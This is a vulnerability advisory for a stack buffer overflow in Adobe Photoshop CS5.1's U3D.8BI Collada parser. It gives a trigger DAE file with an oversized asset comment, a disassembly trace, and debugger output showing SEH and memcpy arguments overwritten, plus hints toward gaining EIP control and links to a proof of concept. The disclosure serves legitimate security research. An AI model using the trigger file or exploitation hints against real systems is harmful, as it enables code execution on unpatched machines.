[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Adobe Photoshop CS5.1 U3D.8BI Library Collada Asset Elements Stack Based Buffer Overflow Vulnerability



Adobe Photoshop CS5.1 U3D.8BI Library Collada Asset Elements Stack Based Buffer Overflow Vulnerability 

download url of a test version: 
http://www.adobe.com/cfusion/tdrc/index.cfm?product=photoshop


Note:
Found three weeks before the CS6 release.
I could not reproduce against CS6, cannot say if there is 
a CVE for this, I think is also possible they patched silently.
However this leaves a lot of Photoshop installations vulnerable.


vulnerability:
A buffer overflow exists in the way Photoshop parses
Collada (*.DAE) asset elements, example file:

..
<?xml version="1.0"?>
<COLLADA xmlns="http://www.collada.org/2005/11/COLLADASchema"; version="1.4.1">
    <asset>
        <contributor>
            <author>rgod</author>
            <authoring_tool>Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2</authoring_tool>
            <comments>Collada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0;
curveConstrainSampling=0;exportCameraAsLookat=0;
exportLights=1;exportCameras=1;exportJointsAndSkin=1;
exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0;
exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0;
exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1;
dereferenceXRefs=0;cameraXFov=0;cameraYFov=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
</comments>
..

While trying to convert the element field from ASCII to Unicode
the U3D.B8I library plugin does a miscalculation 
in allocating a buffer for the user-supplied string
then overwrite the stack with the user-controlled buffer. Critical structures 
are overwritten (SEH), also the arguments of a subsequent memcpy() 
are used-controlled.



vulnerable code, theese routines u3d.8bi (this is repeated one time for
each byte of the string), run trace:

..
10A05C30   55               push    ebp
10A05C31   8BEC             mov     ebp, esp
10A05C33   83EC 10          sub     esp, 10
10A05C36   8B45 08          mov     eax, dword ptr ss:[ebp+8]
10A05C39   0345 0C          add     eax, dword ptr ss:[ebp+C]
10A05C3C   8945 F8          mov     dword ptr ss:[ebp-8], eax
10A05C3F   8B4D 0C          mov     ecx, dword ptr ss:[ebp+C]
10A05C42   894D F4          mov     dword ptr ss:[ebp-C], ecx
10A05C45   8B55 F4          mov     edx, dword ptr ss:[ebp-C]
10A05C48   83EA 01          sub     edx, 1
10A05C4B   8955 F4          mov     dword ptr ss:[ebp-C], edx
10A05C4E   837D F4 03       cmp     dword ptr ss:[ebp-C], 3
10A05C52   77 0A            ja      short U3D.10A05C5E
10A05C54   8B45 F4          mov     eax, dword ptr ss:[ebp-C]
10A05C57   FF2485 A45DA010  jmp     dword ptr ds:[eax*4+10A05DA4]
..

..
10A05D6A   8B4D 08          mov     ecx, dword ptr ss:[ebp+8]
10A05D6D   0FB611           movzx   edx, byte ptr ds:[ecx]
10A05D70   81FA 80000000    cmp     edx, 80
10A05D76   7C 12            jl      short U3D.10A05D8A
10A05D78   8B45 08          mov     eax, dword ptr ss:[ebp+8]
10A05D7B   0FB608           movzx   ecx, byte ptr ds:[eax]
10A05D7E   81F9 C2000000    cmp     ecx, 0C2
10A05D84   7D 04            jge     short U3D.10A05D8A
10A05D86   32C0             xor     al, al
10A05D88   EB 13            jmp     short U3D.10A05D9D
10A05D8A   8B55 08          mov     edx, dword ptr ss:[ebp+8]
10A05D8D   0FB602           movzx   eax, byte ptr ds:[edx]
10A05D90   3D F4000000      cmp     eax, 0F4
10A05D95   7E 04            jle     short U3D.10A05D9B
10A05D97   32C0             xor     al, al
10A05D99   EB 02            jmp     short U3D.10A05D9D
10A05D9B   B0 01            mov     al, 1
10A05D9D   8BE5             mov     esp, ebp
10A05D9F   5D               pop     ebp
10A05DA0   C3               retn
..

..
10A05E4B   83C4 08          add     esp, 8
10A05E4E   0FB6D0           movzx   edx, al
10A05E51   85D2             test    edx, edx
10A05E53   75 0C            jnz     short U3D.10A05E61
10A05E55   C745 F8 03000000 mov     dword ptr ss:[ebp-8], 3
10A05E5C   E9 15020000      jmp     U3D.10A06076
10A05E61   0FB745 F0        movzx   eax, word ptr ss:[ebp-10]
10A05E65   8945 E8          mov     dword ptr ss:[ebp-18], eax
10A05E68   837D E8 05       cmp     dword ptr ss:[ebp-18], 5
10A05E6C   0F87 B5000000    ja      U3D.10A05F27
10A05E72   8B4D E8          mov     ecx, dword ptr ss:[ebp-18]
10A05E75   FF248D 9060A010  jmp     dword ptr ds:[ecx*4+10A06090]
..

..
10A05F12   8B4D F4          mov     ecx, dword ptr ss:[ebp-C]
10A05F15   0FB611           movzx   edx, byte ptr ds:[ecx]
10A05F18   0355 EC          add     edx, dword ptr ss:[ebp-14]
10A05F1B   8955 EC          mov     dword ptr ss:[ebp-14], edx
10A05F1E   8B45 F4          mov     eax, dword ptr ss:[ebp-C]
10A05F21   83C0 01          add     eax, 1
10A05F24   8945 F4          mov     dword ptr ss:[ebp-C], eax
10A05F27   0FB74D F0        movzx   ecx, word ptr ss:[ebp-10]
10A05F2B   8B55 EC          mov     edx, dword ptr ss:[ebp-14]
10A05F2E   2B148D 5034B110  sub     edx, dword ptr ds:[ecx*4+10B1345>
10A05F35   8955 EC          mov     dword ptr ss:[ebp-14], edx
10A05F38   8B45 FC          mov     eax, dword ptr ss:[ebp-4]
10A05F3B   3B45 14          cmp     eax, dword ptr ss:[ebp+14]
10A05F3E   72 1B            jb      short U3D.10A05F5B
10A05F40   0FB74D F0        movzx   ecx, word ptr ss:[ebp-10]
10A05F44   83C1 01          add     ecx, 1
10A05F47   8B55 F4          mov     edx, dword ptr ss:[ebp-C]
10A05F4A   2BD1             sub     edx, ecx
10A05F4C   8955 F4          mov     dword ptr ss:[ebp-C], edx
10A05F4F   C745 F8 02000000 mov     dword ptr ss:[ebp-8], 2
10A05F56   E9 1B010000      jmp     U3D.10A06076
10A05F5B   817D EC FFFF0000 cmp     dword ptr ss:[ebp-14], 0FFFF
10A05F62   77 63            ja      short U3D.10A05FC7
10A05F64   817D EC 00D80000 cmp     dword ptr ss:[ebp-14], 0D800
10A05F6B   72 42            jb      short U3D.10A05FAF
..



..
10A05FAF   8B55 FC          mov     edx, dword ptr ss:[ebp-4]
10A05FB2   66:8B45 EC       mov     ax, word ptr ss:[ebp-14]
10A05FB6   66:8902          mov     word ptr ds:[edx], ax <------------- boom
10A05FB9   8B4D FC          mov     ecx, dword ptr ss:[ebp-4]
10A05FBC   83C1 02          add     ecx, 2
10A05FBF   894D FC          mov     dword ptr ss:[ebp-4], ecx
10A05FC2   E9 AA000000      jmp     U3D.10A06071
..

..
10A06071  ^E9 87FDFFFF      jmp     U3D.10A05DFD
..

..
10A05DFD   8B4D F4          mov     ecx, dword ptr ss:[ebp-C]
10A05E00   3B4D 0C          cmp     ecx, dword ptr ss:[ebp+C]
10A05E03   0F83 6D020000    jnb     U3D.10A06076
10A05E09   C745 EC 00000000 mov     dword ptr ss:[ebp-14], 0
10A05E10   8B55 F4          mov     edx, dword ptr ss:[ebp-C]
10A05E13   0FB602           movzx   eax, byte ptr ds:[edx]
10A05E16   66:0FBE88 5033B1>movsx   cx, byte ptr ds:[eax+10B13350]
10A05E1E   66:894D F0       mov     word ptr ss:[ebp-10], cx
10A05E22   0FB755 F0        movzx   edx, word ptr ss:[ebp-10]
10A05E26   0355 F4          add     edx, dword ptr ss:[ebp-C]
10A05E29   3B55 0C          cmp     edx, dword ptr ss:[ebp+C]
10A05E2C   72 0C            jb      short U3D.10A05E3A
10A05E2E   C745 F8 01000000 mov     dword ptr ss:[ebp-8], 1
10A05E35   E9 3C020000      jmp     U3D.10A06076
10A05E3A   0FB745 F0        movzx   eax, word ptr ss:[ebp-10]
10A05E3E   83C0 01          add     eax, 1
10A05E41   50               push    eax
10A05E42   8B4D F4          mov     ecx, dword ptr ss:[ebp-C]
10A05E45   51               push    ecx
10A05E46   E8 E5FDFFFF      call    U3D.10A05C30
..




Results:

SEH chain of main thread
Address         SE handler
001184B8        Photosho.00410041 <-------------------
00410062 <---   E8CE8B57

After the stack is overwritten a memcpy() is called:

Call stack of main thread
Address    Stack      Procedure / arguments                 Called from                   Frame
00117454   10BB3EB1   <jmp.&MSVCR90.memcpy>                 U3D.10BB3EAC                  00117494
00117458   11720020     dest = 11720020
0011745C   006E006E     src = Photosho.006E006E <-----------
00117460   00C200C2     n = C200C2 (12714178.) <-----------
00117498   10BA64C0   U3D.10BB3E40                          U3D.10BA64BB                  00117494

Error occurs then exception is thrown

EIP -> 00410041

eip is unicode expanded, but it is possible to return inside an ASCII user controlled
memory region by setting the SE handler to Photoshop.00630041.

As attachment, proof of concept code.


Additional note:

0:000> lm -vm U3D
start    end        module name
10630000 107eb000   U3D        (export symbols)       C:\Program Files\adobe\Adobe Photoshop CS5.1\Plug-ins\File Formats\U3D.8BI
    Loaded symbol image file: C:\Program Files\adobe\Adobe Photoshop CS5.1\Plug-ins\File Formats\U3D.8BI
    Image path: C:\Program Files\adobe\Adobe Photoshop CS5.1\Plug-ins\File Formats\U3D.8BI
    Image name: U3D.8BI
    Timestamp:        Mon Mar 28 20:23:29 2011 (4D90D221)
    CheckSum:         001BB7D7
    ImageSize:        001BB000
    File version:     12.1.0.0
    Product version:  12.1.0.0
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Adobe Systems, Incorporated
    ProductName:      Adobe Photoshop CS5.1
    InternalName:     U3D
    OriginalFilename: U3D8B.8BI
    ProductVersion:   CS5.1
    FileVersion:      12.1 (12.1x20110328 [20110328.r.145 2011/03/28:10:30:00 cutoff; r branch])
    FileDescription:  Adobe Photoshop CS5.1
    LegalCopyright:   Copyright 2011 Adobe Systems Inc.

//rgod

original url: http://retrogod.altervista.org/9sg_photoshock_adv.htm

poc: http://retrogod.altervista.org/9sg_photoshock_u3d.htm